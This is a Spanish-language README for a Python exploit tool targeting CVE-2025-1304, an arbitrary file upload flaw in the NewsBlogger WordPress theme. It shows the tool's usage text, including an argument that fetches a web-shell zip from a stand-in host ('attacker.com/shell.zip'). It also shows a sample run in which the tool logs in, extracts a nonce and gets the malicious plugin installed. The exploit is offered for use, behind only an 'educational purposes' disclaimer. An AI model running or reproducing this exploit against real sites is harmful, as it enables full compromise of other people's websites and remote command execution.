
El tema NewsBlogger de WordPress <= 0.2.5.1 es vulnerable a Subida Arbitraria de Archivos
Puntuación CVSS: 8.8 (Alta)
Tipo de vulnerabilidad: Subida Arbitraria de Archivos
Componente: Tema de WordPress
ID de CVE: CVE-2025-1304
El tema NewsBlogger de WordPress (versiones <= 0.2.5.1) es vulnerable a una subida arbitraria de archivos a través del panel de bienvenida del administrador.
Esta vulnerabilidad permite a cualquier usuario autenticado — incluidos aquellos con el rol mínimo de Suscriptor — subir un archivo .zip malicioso que contenga un web shell.
La subida se produce a través de un campo de URL de plugin sin validar, que no consigue verificar adecuadamente el contenido o el tipo del archivo subido.
Un ataque exitoso podría conducir al compromiso total del sitio web, incluida la ejecución remota de comandos y la escalada de privilegios.
Este script de Python automatiza la explotación de la vulnerabilidad mediante:
nonce de la página de bienvenida vulnerable.python CVE-2025-1304.py -h
usage: a.py [-h] --url URL --username USERNAME --password PASSWORD --shellweb SHELLWEB
WordPress NewsBlogger Theme vulnerable to Arbitrary File Upload #By: Nxploited ( Khaled Alenazi )
options:
-h, --help show this help message and exit
--url, -u URL Target base URL (e.g., http://target/wordpress)
--username, -un USERNAME WordPress admin username
--password, -p PASSWORD WordPress admin password
--shellweb, -shell SHELLWEB
Direct URL to the malicious shell zip (e.g., http://attacker.com/shell.zip)
[+] Logging in to http://target/wordpress/wp-login.php
[+] Logged in successfully.
[+] Fetching welcome page to extract nonce: http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome
[+] Extracted nonce: 012818100b
[+] Sending malicious plugin URL to: http://target/wordpress/wp-admin/admin-ajax.php
[+] Server response:
{"success":true,"data":{"redirect_url":"http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome"}}
Este código se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas.
El autor no asume ninguna responsabilidad por el mal uso o los daños causados por esta herramienta.
Por: Nxploited ( Khaled Alenazi )